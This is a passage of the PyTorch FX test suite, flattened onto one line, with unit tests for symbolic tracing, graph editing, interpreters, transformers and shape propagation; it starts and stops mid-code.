__init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.bar = Bar() def forward(self, x): return self.bar(x) - self.param baz = Baz() traced = symbolic_trace(baz) traced.graph.lint() copied = copy.deepcopy(traced) copied.graph.lint() def test_deepcopy_graph_with_tracer_cls(self): class TestTracer(Tracer): def is_leaf_module(self, module, name): return True g = Graph(tracer_cls=TestTracer) x = g.placeholder("x") g.output(x) h = copy.deepcopy(g) self.assertIsNotNone(h._tracer_cls) self.assertTrue(g._tracer_cls == h._tracer_cls) def test_unpack_list_better_error(self): class SomeArgs(torch.nn.Module): def forward(self, a, b): return torch.rand(3, 4) class UnpacksList(torch.nn.Module): def __init__(self): super().__init__() self.sa = SomeArgs() def forward(self, x : list): return self.sa(*x) ul = UnpacksList() with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'): symbolic_trace(ul) def test_unpack_dict_better_error(self): class SomeKwargs(torch.nn.Module): def forward(self, x=3, y=4): return torch.rand(3, 4) class UnpacksDict(torch.nn.Module): def __init__(self): super().__init__() self.sk = SomeKwargs() def forward(self, x : dict): return self.sk(**x) ud = UnpacksDict() with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'): symbolic_trace(ud) def test_pretty_print_targets(self): # Test that Graph pretty-print prints friendly name for targets # in `operator` and `builtins` class SomeMod(torch.nn.Module): def forward(self, x): return torch.add(x.foo + x.bar, 3.0) traced = symbolic_trace(SomeMod()) graph_str = str(traced.graph) self.assertIn('builtins.getattr', graph_str) self.assertIn('operator.add', graph_str) self.assertIn('torch.add', graph_str) def test_pretty_print_node(self): class M(torch.nn.Module): def __init__(self): super().__init__() self.param: torch.nn.Parameter = torch.nn.Parameter( torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x: torch.Tensor, y: int = 2): return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0) traced = symbolic_trace(M()) all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes]) FileCheck().check("x").check("placeholder") \ .check("y").check("placeholder") \ .check("getitem").check("call_function") \ .check("param").check("get_attr") \ .check("add").check("call_function") \ .check("linear").check("call_module") \ .check("clamp").check("call_method") \ .run(all_formatted) def test_script_tensor_constant(self): # TorchScript seems to ignore attributes that start with `__`. # We used to call anonymous Tensor values `__tensor_constant*`, but # they were getting ignored by script. Now they're called # `_tensor_constant*` class IHaveATensorConstant(torch.nn.Module): def forward(self, x): return x + torch.rand(3, 4) traced = torch.fx.symbolic_trace(IHaveATensorConstant()) torch.jit.script(traced) def test_autowrap_functions(self): class AutowrapFnTest(torch.nn.Module): def forward(self, x): return fx_int(x.shape[0] / 2) class AutowrapFnTest2(torch.nn.Module): def forward(self, x): return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2) # Check function(s) are wrapped # `int` would normally throw a TypeError as argument can't be `Proxy` tracer = Tracer(autowrap_functions=(fx_int,)) graph = tracer.trace(AutowrapFnTest()) traced = GraphModule(tracer.root, graph, 'test') tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2)) tracer_2.trace(AutowrapFnTest2()) # Test scriptability traced_scripted = torch.jit.script(traced) self.assertEqual(traced_scripted(torch.rand(4)), 2) def test_torch_fx_len(self): class FXLenTest(torch.nn.Module): def forward(self, x): return len(x) traced = symbolic_trace(FXLenTest()) self.assertEqual(traced(torch.rand(3, 4)), 3) # Test scriptability scripted = torch.jit.script(FXLenTest()) self.assertEqual(scripted(torch.rand(3)), 3) traced_scripted = torch.jit.script(traced) self.assertEqual(traced_scripted(torch.rand(3)), 3) # Test non-proxy len class FXLenTest2(torch.nn.Module): def __init__(self): super().__init__() self.l = [3, 4, 5] def forward(self, x): return x + len(self.l) traced2 = symbolic_trace(FXLenTest2()) inp = torch.rand(3, 4) self.assertEqual(traced2(inp), inp + 3.0) self.assertIs(len, builtins.len) def test_torch_fx_getattr(self): class FXGetattrTest(torch.nn.Module): def forward(self, x): return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3])) traced = symbolic_trace(FXGetattrTest()) self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3])) def test_sqrt(self): class Sqrt1(torch.nn.Module): def forward(self, x): return sqrt(x.size(0)) class Sqrt2(torch.nn.Module): def forward(self, x): return math.sqrt(x.size(0)) class Sqrt3(torch.nn.Module): def forward(self, x): return x + math.sqrt(2) + sqrt(2) self.checkGraphModule(Sqrt1(), [torch.zeros(8)]) self.checkGraphModule(Sqrt2(), [torch.zeros(8)]) self.checkGraphModule(Sqrt3(), [torch.zeros(8)]) self.assertIs(sqrt, _sqrt) self.assertIs(math.sqrt, _sqrt) def test_torch_custom_ops(self): class M(torch.nn.Module): def forward(self, a): b = torch.ops.aten.sigmoid(a) c = torch.ops.aten.cat([a, b]) return torch.ops.aten.cat((c, c)) m = M() input = torch.randn(3) ref_out = m(input) gm = symbolic_trace(m) gm.graph.lint() out = gm(input) self.assertEqual(out, ref_out) def test_pickle_torch_custom_ops(self): class M(torch.nn.Module): def forward(self, a): b = torch.ops.aten.sigmoid(a) c = torch.ops.aten.cat([a, b]) return torch.ops.aten.cat((c, c)) m = M() input = torch.randn(3) ref_out = m(input) gm = symbolic_trace(m) gm.graph.lint() pickled = pickle.dumps(gm) loaded = pickle.loads(pickled) self.assertEqual(loaded(input), gm(input)) def test_pretty_print(self): st = SimpleTest() traced = symbolic_trace(st) traced.graph.lint() printed = str(traced) assert 'SimpleTest()' in printed assert 'torch.relu' in printed def test_pretty_print_graph(self): class KwargPrintTest(torch.nn.Module): def forward(self, x): return torch.squeeze(x + 3.0, dim=2) st = KwargPrintTest() traced = symbolic_trace(st) traced.graph.lint() stringed = str(traced.graph) for s in ['args', 'kwargs', '#users']: assert s in stringed def test_custom_proxy_type(self): class TensorPair: def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair(x : TensorPair, y : TensorPair): s = x.add(y) return s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) y = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) ref_out = use_tensor_pair(x, y) traced = symbolic_trace(use_tensor_pair) traced_out = traced(x, y) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_type_literal(self): class TensorPair(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair_literal(x : TensorPair): s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3))) return s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) ref_out = use_tensor_pair_literal(x) traced = symbolic_trace(use_tensor_pair_literal) traced_out = traced(x) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_dynamic_value(self): class TensorPair(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor): s = x.add(TensorPair(y, y)) return s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) y = torch.randn(5, 3) ref_out = use_tensor_pair_ctor(x, y) traced = symbolic_trace(use_tensor_pair_ctor) traced_out = traced(x, y) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_input_dependent_control_flow(self): class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, inp): if inp.sum() == 0: self.is_zero = True self.tensor = torch.tensor([]) else: self.is_zero = False self.tensor = inp def add(self, other): if self.is_zero: return ZeroTensor(other.tensor) elif other.is_zero: return self def use_zero_tensor(x : torch.Tensor, y : torch.Tensor): return ZeroTensor(x + y) x, y = torch.randn(5, 3), torch.randn(5, 3) ref_out = use_zero_tensor(x, y) traced = symbolic_trace(use_zero_tensor) traced_out = traced(x, y) self.assertEqual(traced_out.is_zero, ref_out.is_zero) self.assertEqual(traced_out.tensor, ref_out.tensor) def test_graph_fns(self): g = Graph() a = g.placeholder('a') b = g.call_module('linear', (a,)) c = g.get_attr('bias') d = g.call_method('add', (b, c)) e = g.call_function(torch.sin, (d,)) g.output(e) mod = torch.nn.Module() mod.linear = torch.nn.Linear(3, 4) mod.bias = torch.rand(4) gm = GraphModule(mod, g) gm.graph.lint() input = torch.rand(3) r = gm(input) ref = torch.sin(mod.linear(input) + mod.bias) self.assertEqual(r, ref) def test_remove_uses(self): g : torch.fx.Graph = Graph() x : torch.fx.Node = g.placeholder('x') relu : torch.fx.Node = g.call_function(torch.relu, (x,)) neg : torch.fx.Node = g.call_function(torch.neg, (relu,)) g.output(neg) neg.replace_all_uses_with(relu) g.erase_node(neg) self.assertTrue(neg not in relu.users) def test_nonetype_annotation(self): eb = torch.nn.EmbeddingBag(3, 4) symbolic_trace(eb) def test_pickle_nonetype_annotation(self): eb = torch.nn.EmbeddingBag(10, 3, mode='sum') traced = symbolic_trace(eb) pickled = pickle.dumps(traced) loaded = pickle.loads(pickled) loaded.graph.lint() input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9]) offsets = torch.LongTensor([0, 4]) self.assertEqual(loaded(input, offsets), traced(input, offsets)) def test_return_tuple(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: return (x, x + x) original = M() traced = symbolic_trace(original) self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1))) def test_construct_root_dict(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,)) c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) linear_mod : torch.nn.Module = torch.nn.Linear(3, 4) add_param : torch.Tensor = torch.rand(3, 4) gm : torch.fx.GraphModule = torch.fx.GraphModule( {'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph) gm.graph.lint() assert 'self.foo.bar.baz' in gm.code x : torch.Tensor = torch.rand(3, 3) out : torch.Tensor = gm(x) ref_out : torch.Tensor = linear_mod(x) + add_param self.assertEqual(out, ref_out) def test_symbolic_trace_assert(self): class AssertsTensorShape(torch.nn.Module): def forward(self, x): torch._assert(x.shape[1] > 4, "assert_foobar") return x m = AssertsTensorShape() # verify traceability traced = symbolic_trace(m) # verify assertion on traced model works correctly at runtime traced(torch.rand(4, 5)) with self.assertRaisesRegex(AssertionError, "assert_foobar"): traced(torch.rand(4, 3)) # verify the symbolically traced module is scriptable ms = torch.jit.script(m) with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"): ms(torch.rand(4, 3)) def test_fx_create_arg(self): class CustomArgObject: def __init__(self, x, y): self.x = x self.y = y def __fx_create_arg__(self, tracer: torch.fx.Tracer): return tracer.create_node( "call_function", CustomArgObject, args=( tracer.create_arg(self.x), tracer.create_arg(self.y), ), kwargs={}, ) class HasCustomArgObjectWhenLeaf(torch.nn.Module): def forward(self, o: CustomArgObject): # Not normally traceable; good reason to make # this module a leaf. for x in o.x: o.y += x return o.y class Root(torch.nn.Module): def __init__(self): super().__init__() self.inner = HasCustomArgObjectWhenLeaf() def forward(self, x, y): o = CustomArgObject(x, y) return self.inner(o) class CreateArgTracer(torch.fx.Tracer): def is_leaf_module(self, m, module_qualified_name): return type(m) is HasCustomArgObjectWhenLeaf m = Root() graph = CreateArgTracer().trace(m) gm = torch.fx.GraphModule(m, graph) assert "CustomArgObject(" in gm.code def test_trace_fn_constant(self): some_constant = torch.rand(3, 4) def add_const(x): return some_constant + x traced = symbolic_trace(add_const) input = torch.rand(3, 4) self.assertEqual(traced(input), add_const(input)) def test_copy_no_remap(self): traced = symbolic_trace(SimpleTest()) g = traced.graph copied = torch.fx.Graph() for node in g.nodes: copied.node_copy(node) with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'): copied.lint() def test_wrong_topo(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,)) c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) nodes = list(graph.nodes) nodes[3].append(nodes[2]) with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'): graph.lint() def test_wrong_target_type(self): graph : torch.fx.Graph = torch.fx.Graph() with self.assertRaises(ValueError): n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo', args=(), kwargs={}) def test_example_shape_prop(self): class TestCase(torch.nn.Module): def __init__(self): super().__init__() self.attr = torch.randn(3, 4) self.submod = torch.nn.Linear(4, 4) def forward(self, x): return torch.neg(self.submod(x.relu() + self.attr)) tc = TestCase() tc_traced = symbolic_trace(tc) ref_out = tc_traced(torch.rand(3, 4)) shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4)) # Make sure we're testing all opcodes opcodes = set() output_shape : Optional[torch.Shape] = None output_stride : Optional[Tuple[int]] = None for node in tc_traced.graph.nodes: opcodes.add(node.op) if node.op == 'output': output_shape = node.args[0].meta['tensor_meta'].shape output_stride = node.args[0].meta['tensor_meta'].stride self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method', 'call_module', 'output'])) # Test shape propogation and make sure results match actual self.assertEqual(output_shape, ref_out.shape) self.assertEqual(output_stride, ref_out.stride()) def test_shape_prop_layout(self): class ConvTest(torch.nn.Module): def __init__(self): super().__init__() self.conv_mod = torch.nn.Conv2d(5, 5, 3) def forward(self, x): return self.conv_mod(x) # contiguous layout test_mod = ConvTest() traced = symbolic_trace(test_mod) x = torch.randn(5, 5, 224, 224) shape_prop.ShapeProp(traced).propagate(x) assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format for node in traced.graph.nodes)) x_channels_last = x.contiguous(memory_format=torch.channels_last) traced.to(memory_format=torch.channels_last) shape_prop.ShapeProp(traced).propagate(x_channels_last) for node in traced.graph.nodes: # NB: the implementation of conv may not preserve the memory format, # unfortunately. The best we can do is just check that the placeholder # node is channels-last if node.op in {'placeholder'}: self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last) def test_shape_prop_aggregate(self): class ReturnTwo(torch.nn.Module): def forward(self, x): return (3, torch.sum(x)) class UnderTest(torch.nn.Module): def __init__(self): super().__init__() self.rt = ReturnTwo() def forward(self, x): return self.rt(x) ut = UnderTest() class RTTracer(torch.fx.Tracer): def is_leaf_module(self, m, module_qualified_name): return type(m) is ReturnTwo graph = RTTracer().trace(ut) mod = torch.fx.GraphModule(ut, graph) shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4)) for node in mod.graph.nodes: if node.op == 'call_module': assert 'tensor_meta' in node.meta tensor_meta = node.meta['tensor_meta'] assert tensor_meta[0] == 3 assert tensor_meta[1].shape == torch.Size([]) def test_shape_prop_layout_3d(self): class ConvTest3d(torch.nn.Module): def __init__(self): super().__init__() self.conv_mod = torch.nn.Conv3d(5, 5, 3) def forward(self, x): return self.conv_mod(x) test_mod_3d = ConvTest3d() traced_3d = symbolic_trace(test_mod_3d) x_3d = torch.randn(5, 5, 224, 224, 15) shape_prop.ShapeProp(traced_3d).propagate(x_3d) assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format for node in traced_3d.graph.nodes)) x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d) traced_3d.to(memory_format=torch.channels_last_3d) shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d) for node in traced_3d.graph.nodes: # NB: the implementation of conv may not preserve the memory format, # unfortunately. The best we can do is just check that the placeholder # node is channels-last if node.op in {'placeholder'}: self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d) def test_interpreter(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) interpreter = Interpreter(gm) input = torch.randn(3, 4) self.assertEqual(interpreter.run(input), gm(input)) self.assertEqual(interpreter.run(input), m(input)) def test_interpreter_run_node_override(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) class RunNodeInterpreter(Interpreter): def __init__(self, module): super().__init__(module) def run_node(self, n : Node) -> Any: result = super().run_node(n) n.cached_value = result return result input = torch.randn(3, 4) RunNodeInterpreter(gm).run(input) for node in gm.graph.nodes: assert hasattr(node, 'cached_value') def test_interpreter_onthefly_swap(self): def fn(x): return torch.sigmoid(x).neg() gm = torch.fx.symbolic_trace(fn) class NegSigmSwapInterpreter(Interpreter): def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == torch.sigmoid: return torch.neg(*args, **kwargs) return super().call_function(n) def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == 'neg': call_self, *args_tail = args return call_self.sigmoid(*args_tail, **kwargs) return super().call_method(n) input = torch.randn(3, 4) result = NegSigmSwapInterpreter(gm).run(input) self.assertEqual(result, torch.neg(input).sigmoid()) def test_interpreter_partial_eval(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) gm = torch.fx.symbolic_trace(MyModule()) interp = Interpreter(gm) env = {} for node in gm.graph.nodes: if node.op == 'call_module' and node.target == 'linear': env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0 break assert len(env) == 1 x = torch.randn(3, 4) result = interp.run(x, initial_env=env) self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0)) def test_interpreter_star_args(self): def with_star_args(x, *args): return x + args[0] gm = torch.fx.symbolic_trace(with_star_args) interp = Interpreter(gm) result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4)) self.assertEqual(result, torch.ones(3, 4) * 2.0) @skipIfNoTorchVision def test_interpreter_noop_resnet18(self): rn18 = torchvision_models.resnet18() transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform() inp = torch.randn(5, 3, 224, 224) self.assertEqual(transformed(inp), rn18(inp)) @skipIfNoTorchVision def test_interpreter_gc_values(self): rn18 = torchvision_models.resnet18() interp = Interpreter(symbolic_trace(rn18)) inp = torch.rand(5, 3, 224, 224) out = interp.run(inp) env_key_names = set(n.name for n in interp.env.keys()) self.assertEqual(env_key_names, set(['output'])) def test_transformer_noop(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) new_gm = Transformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(new_gm(input), gm(input)) def test_transformer_op_swap(self): def fn(x): return torch.sigmoid(x).neg() gm = torch.fx.symbolic_trace(fn) class NegSigmSwapXformer(Transformer): def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == torch.sigmoid: return torch.neg(*args, **kwargs) return super().call_function(n) def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == 'neg': call_self, *args_tail = args return call_self.sigmoid(*args_tail, **kwargs) return super().call_method(n) transformed = NegSigmSwapXformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(transformed(input), torch.neg(input).sigmoid()) def test_transformer_multi_outputs(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): x = x + self.param out = self.linear(x) return x, out m = MyModule() gm = torch.fx.symbolic_trace(m) new_gm = Transformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(new_gm(input), gm(input)) def test_fn_type_annotations(self): class Foo(torch.nn.Module): def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]: return {'a': p.x + p.y + z + i} foo_scripted = torch.jit.script(Foo()) foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3) fxed = symbolic_trace(Foo()) fxed_scripted = torch.jit.script(fxed) fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3) def test_fn_type_annotation_empty(self): def forward(a : List[torch.Tensor]): return a[0] torch.jit.script(symbolic_trace(forward)) def test_wrapped_method(self): def wrap_with_relu(fn): @functools.wraps(fn) def wrapper(*args, **kwargs): return torch.relu(fn(*args, **kwargs)) return wrapper class Foo(torch.nn.Module): @wrap_with_relu def forward(self, x, w): return torch.matmul(x, w) f = Foo() traced = symbolic_trace(f) x, w = torch.rand(3, 4), torch.rand(4, 4) self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes)) def test_empty_graph_codegen(self): graph = torch.fx.Graph() gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(gm(), None) def test_sequential(self): m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1)) gm = torch.fx.symbolic_trace(m) gm_copy = copy.deepcopy(gm) def test_ctx_mgr(self): @contextlib.contextmanager def do_nothing(): yield class M(torch.nn.Module): def __init__(self): super().__init__() @do_nothing() def forward(self, x): return torch.relu(x) m = M() self.checkGraphModule(m, (torch.rand(3, 4),)) def test_typename_print(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,), type_expr=List[float]) output : torch.fx.Node = graph.output(b) self.assertTrue('typing.List[float]' in str(graph)) def test_ellipsis(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, x, y): return x + y[:, 1:10, ...] traced = symbolic_trace(M()) x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4) self.assertEqual(traced(x, y), x + y[:, 1:10, ...]) def test_inf_nan(self): class FooMod(torch.nn.Module): def forward(self, x): return x + float('inf'), x + float('-inf'), x + float('nan') fm = FooMod() self.checkGraphModule(fm, (torch.rand(3, 4),)) def test_inf_nan_kwds(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf') c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan') graph.output((b, c)) gm = torch.fx.GraphModule(torch.nn.Module(), graph) x = torch.rand(3, 4) self.assertEqual(gm(x), (x + float('inf'), x + float('nan'))) def test_deepcopy_recursion_depth(self): depth = sys.getrecursionlimit() + 20 g = torch.fx.Graph() x = g.placeholder('x') for i in range(depth): x = g.call_function(torch.relu, (x,)) g.output(x) copied_graph = copy.deepcopy(g) val_map = {} for orig_node, new_node in zip(g.nodes, copied_graph.nodes): val_map[orig_node] = new_node for orig_node, new_node in zip(g.nodes, copied_graph.nodes): orig_users = set(orig_node.users.keys()) orig_users_equiv = set(val_map[u] for u in orig_users) new_users = set(new_node.users.keys()) self.assertEqual(orig_users_equiv, new_users) @skipIfNoTorchVision def test_replace_uses(self): rn18 = torchvision_models.resnet18() class LowerReluTracer(torch.fx.Tracer): def is_leaf_module(self, m : torch.nn.Module, qualname : str): if isinstance(m, torch.nn.ReLU): return False return super().is_leaf_module(m, qualname) rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18)) to_erase = [] for node in rn18_traced.graph.nodes: if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]: kwargs = node.kwargs.copy() # Neg doesn't have in-place kwargs.pop('inplace') with rn18_traced.graph.inserting_before(node): new_node = rn18_traced.graph.call_function( the_function=torch.neg, args=node.args, kwargs=node.kwargs) node.replace_all_uses_with(replace_with=new_node) to_erase.append(node) for node in to_erase: rn18_traced.graph.erase_node(node) def test_replace_input(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) b.replace_input_with(x, y) gm = torch.fx.GraphModule(torch.nn.Module(), graph) input_x = torch.randn(33, 44) input_y = torch.randn(11, 22) self.assertEqual(gm(input_x, input_y), torch.relu(input_y)) def test_insertion_point(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) with graph.inserting_before(b): neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,)) _, *relu_args = b.args b.args = (neg, *relu_args) gm = torch.fx.GraphModule(torch.nn.Module(), graph) input = torch.randn(33, 44) self.assertEqual(gm(input), torch.relu(torch.neg(input))) def test_update_args_api(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph) inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5) self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x)) b.update_arg(0, y) new_gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y)) def test_update_kwargs_api(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x}) output : torch.fx.Node = graph.output(b) orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph) inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5) self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x)) b.update_kwarg('input', y) new_gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y)) def test_move_before(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,)) _, *relu_args = b.args b.args = (neg, *relu_args) b.prepend(neg) gm = torch.fx.GraphModule(torch.nn.Module(), graph) input = torch.randn(33, 44) self.assertEqual(gm(input), torch.relu(torch.neg(input))) def test_erase_node_error(self): st = SimpleTest() traced = symbolic_trace(st) for node in traced.graph.nodes: # Test deleting with uses both in another Node and at the output if node.target in [operator.add, torch.relu]: with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'): traced.graph.erase_node(node) def test_copy_it(self): d = immutable_dict([(3, 4), (5, 6)]) l = immutable_list([(3, 4), (5, 6)]) self.assertEqual(d, deepcopy(d)) self.assertEqual(l, deepcopy(l)) def test_get_torch_func_signature(self): for key in dir(torch): obj = getattr(torch, key) if callable(obj): schemas = get_signature_for_torch_op(obj) def test_find_uses(self): graph = torch.fx.Graph() x = torch.fx.Proxy(graph.placeholder('x')) y = torch.relu(x) z = x + x u = torch.neg(x) graph.output((y + z + u).node) graph.lint() users_of_x = x.node.users self.assertEqual(len(users_of_x), 3) expected_ops = set(['relu', 'add', 'neg']) for use in users_of_x: assert any(use.name.startswith(prefix) for prefix in expected_ops) def test_inline_graph(self): class InlineInto(torch.nn.Module): def forward(self, x): return torch.relu(x) class ToInline(torch.nn.Module): def forward(self, x): return torch.neg(x) inline_into = symbolic_trace(InlineInto()) to_inline = symbolic_trace(ToInline()) combined_graph = torch.fx.Graph() output_node = combined_graph.graph_copy(inline_into.graph, {}) input_node = list(to_inline.graph.nodes)[0] assert input_node and input_node.op == 'placeholder' val_map = {input_node : output_node} output = combined_graph.graph_copy(to_inline.graph, val_map) combined_graph.output(output) combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph) input = torch.rand(3, 4) self.assertEqual(combined_module(input), input.relu().neg()) def test_multi_insert_point(self): graph = torch.fx.Graph() x = torch.fx.Proxy(graph.placeholder('x')) relu = torch.relu(x) with graph.inserting_before(relu.node): y = torch.neg(x) z = torch.tanh(y) graph.output((relu.node, z.node)) graph.lint() expected_ops = ['x', 'neg', 'tanh', 'relu'] for node, expected in zip(graph.nodes, expected_ops): assert expected in node.name def test_reassign_args_kwargs_uses(self): graph = torch.fx.Graph() x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y')) z = x + y zed = z + z + z graph.output(zed.node) graph.lint() # zed = z + z + z -> zed = z + z + x zed.node.args = (zed.node.args[0], x.node) self.assertEqual(x.node.users.keys(), [z.node, zed.node]) # z = x + y -> z = y + y z.node.args = (y.node, y.node) self.assertEqual(x.node.users.keys(), [zed.node]) def test_trace_function(self): def foo(x, y): return 